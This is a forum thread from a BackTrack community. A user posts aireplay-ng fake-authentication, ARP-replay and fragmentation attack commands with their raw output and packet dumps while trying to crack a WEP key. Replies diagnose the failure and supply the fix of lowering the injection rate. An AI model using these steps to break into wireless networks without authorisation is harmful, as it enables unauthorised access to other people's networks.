Results 1 to 5 of 5

Thread: BT3 aireplay-ng not working

  1. #1
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    7

    Default BT3 aireplay-ng not working

    hello,

    have problem to get wep key from my AP

    here are the commands i use.

    in #data field after ne hours there do nothing



    CH 10 ][ Elapsed: 20 mins ][ 2008-12-25 14:40

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:04:0E:56:01:9E 23 12 2926 59 0 10 54 WEP WEP default


    bt ~ # aireplay-ng -1 6000 -e DSLhome -a 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    14:26:21 Waiting for beacon frame (BSSID: 00:04:0E:56:01:9E) on channel 10

    14:26:22 Sending Authentication Request (Open System)

    14:26:24 Sending Authentication Request (Open System)

    14:26:26 Sending Authentication Request (Open System)

    14:26:28 Sending Authentication Request (Open System)

    14:26:30 Sending Authentication Request (Open System)

    14:26:32 Sending Authentication Request (Open System)

    14:26:34 Sending Authentication Request (Open System)

    14:26:36 Sending Authentication Request (Open System)

    14:26:38 Sending Authentication Request (Open System)

    14:26:40 Sending Authentication Request (Open System)

    14:26:42 Sending Authentication Request (Open System)

    14:26:44 Sending Authentication Request (Open System)

    14:26:46 Sending Authentication Request (Open System)

    14:26:48 Sending Authentication Request (Open System)

    14:26:50 Sending Authentication Request (Open System)

    14:26:52 Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.



    bt ~ # aireplay-ng -3 -b 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    14:31:09 Waiting for beacon frame (BSSID: 00:04:0E:56:01:9E) on channel 10
    Saving ARP requests in replay_arp-1225-143109.cap
    You should also start airodump-ng to capture replies.
    Read 1079 packets (got 1 ARP requests and 0 ACKs), sent 20797 packets...(484 pps)


    bt ~ # aireplay-ng -5 -b 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    14:19:56 Waiting for beacon frame (BSSID: 00:04:0E:56:01:9E) on channel 10
    14:19:57 Waiting for a data packet...
    Read 436 packets...

    Size: 616, FromDS: 1, ToDS: 0 (WEP)

    BSSID = 00:04:0E:56:01:9E
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 00:04:0E:56:01:9C

    0x0000: 0842 0000 ffff ffff ffff 0004 0e56 6c9e .B...........Vl.
    0x0010: 0004 0e56 6c9c d0f3 7d54 7700 cd75 d362 ...Vl...}Tw..u.b
    0x0020: 8b33 a049 b6a2 41df 336e 5616 e274 ae52 .3.I..A.3nV..t.R
    0x0030: 487e 7f97 b72e 0183 80a8 cb1d dfb8 050a H~.............
    0x0040: 7ba6 ecb8 4873 edb6 afba 84bf e5b0 9ac8 {...Hs..........
    0x0050: ecf2 fa41 7b2e 3e79 fc6c 52ba c348 954b ...A{.>y.lR..H.K
    0x0060: fbdd e307 267a f7d1 3950 2dd1 7da6 0db9 ....&z..9P-.}...
    0x0070: f8b6 d514 d74c 34d5 3b47 d00d add1 20ee .....L4.;G.... .
    0x0080: c830 ecd3 222a 1cf4 dd13 79f6 be83 8a35 .0.."*....y....5
    0x0090: 4ae4 e166 0909 bd00 eca2 03eb 1b49 a5d3 J..f.........I..
    0x00a0: d82e 380a 4a7d 4d66 bf4e b2f8 4ca6 759d ..8.J}Mf.N..L.u.
    0x00b0: e571 1d7b 731d f848 07ee 00d2 b6db ba01 .q.{s..H........
    0x00c0: 6a9c 61a7 84f1 f0c3 ee60 7c1e 48c3 b625 j.a......`|.H..%
    0x00d0: 80e3 3063 fb15 3294 2b2a a222 9c4f 6fa3 ..0c..2.+*.".Oo.
    --- CUT ---

    Use this packet ? y

    Saving chosen packet in replay_src-1225-142301.cap
    14:23:08 Data packet found!
    14:23:08 Sending fragmented packet
    14:23:10 No answer, repeating...
    14:23:10 Trying a LLC NULL packet
    14:23:10 Sending fragmented packet
    14:23:11 No answer, repeating...
    14:23:11 Sending fragmented packet
    14:23:13 No answer, repeating...
    14:23:13 Trying a LLC NULL packet
    14:23:13 Sending fragmented packet
    14:23:15 No answer, repeating...
    14:23:15 Sending fragmented packet
    14:23:16 No answer, repeating...
    14:23:16 Trying a LLC NULL packet
    14:23:16 Sending fragmented packet
    14:23:18 No answer, repeating...
    14:23:18 Sending fragmented packet
    14:23:20 No answer, repeating...
    14:23:20 Trying a LLC NULL packet
    14:23:20 Sending fragmented packet
    14:23:21 No answer, repeating...
    14:23:21 Sending fragmented packet
    14:23:23 No answer, repeating...
    14:23:23 Trying a LLC NULL packet
    14:23:23 Sending fragmented packet
    14:23:24 No answer, repeating...
    14:23:24 Sending fragmented packet
    14:23:26 No answer, repeating...
    14:23:26 Still nothing, trying another packet...


    Size: 118, FromDS: 1, ToDS: 0 (WEP)

    BSSID = 00:04:0E:56:01:9E
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 00:11:6B:18:4D:1B

    0x0000: 0842 0000 ffff ffff ffff 0004 0e56 6c9e .B...........Vl.
    0x0010: 0011 6b37 4d1b 5017 e506 5600 e6a7 84da ..k7M.P...V.....
    0x0020: 9cc6 3aee 4a07 4c64 32e3 f82a a0e1 116d ..:.J.Ld2..*...m
    0x0030: 2335 6d32 772b f241 14a5 d131 34e0 4a7f #5m2w+.A...14.J
    0x0040: 1e46 8d40 2b2d 00c9 511c 0bad f0ab c980 .F.@+-..Q.......
    0x0050: 4373 1403 df42 cfcb 2325 ed7a ebe8 bbe2 Cs...B..#%.z....
    0x0060: d714 f2a6 f060 fa2e 0d4f 7a0b e3f9 4f97 .....`...Oz...O.
    0x0070: d874 6d1c f03a .tm..:

    Use this packet ? y

    Saving chosen packet in replay_src-1225-142326.cap
    14:23:32 Data packet found!
    14:23:32 Sending fragmented packet
    14:23:33 No answer, repeating...
    14:23:33 Trying a LLC NULL packet
    14:23:33 Sending fragmented packet
    14:23:35 No answer, repeating...
    14:23:35 Sending fragmented packet
    14:23:36 No answer, repeating...
    14:23:36 Trying a LLC NULL packet
    14:23:36 Sending fragmented packet
    14:23:38 No answer, repeating...
    14:23:38 Sending fragmented packet
    14:23:39 No answer, repeating...
    14:23:39 Trying a LLC NULL packet
    14:23:39 Sending fragmented packet
    14:23:41 No answer, repeating...
    14:23:41 Sending fragmented packet
    14:23:42 No answer, repeating...
    14:23:42 Trying a LLC NULL packet
    14:23:42 Sending fragmented packet
    14:23:44 No answer, repeating...
    14:23:44 Sending fragmented packet



    bt ~ # aireplay-ng -3 -b 00:04:0E:56:01:9E -h 00:11:22:33:44:55 wlan0
    14:23:51 Waiting for beacon frame (BSSID: 00:04:0E:56:6C:9E) on channel 10
    Saving ARP requests in replay_arp-1225-142351.cap
    You should also start airodump-ng to capture replies.
    Read 2190 packets (got 2 ARP requests and 0 ACKs), sent 129748 packets...(499 pps)

  2. #2
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Since the fake authentication (-1) isn't successfull there is no point in moving on with the other attack modes as the AP will simply disregard all packets sent out by you.
    -Monkeys are like nature's humans.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    7

    Default

    thanks for answer.

    when -1 not working with smiley, i have no change to get the wep key with -3, -4, -5 understand you right?

    maybe have other command for test with -1 ?

  4. #4
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Default

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    limit the injection rate

    iwconfig wlan0 rate 1M

    and proceed ahead with fake auth as its necessary to authenticate with AP first.


  5. #5
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    7

    Default

    thanks, with this is working.
    iwconfig wlan0 rate 1M

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •